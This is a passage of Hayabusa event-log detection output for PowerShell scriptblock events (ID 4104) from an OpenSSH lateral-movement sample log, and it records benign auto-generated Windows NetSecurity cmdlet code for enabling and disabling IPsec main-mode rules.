-exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [Validate",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"NotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, 
[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, 
$script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject'))",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"NotNull()] [string[]] ${Name}, 
[Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] 
[ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] 
${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
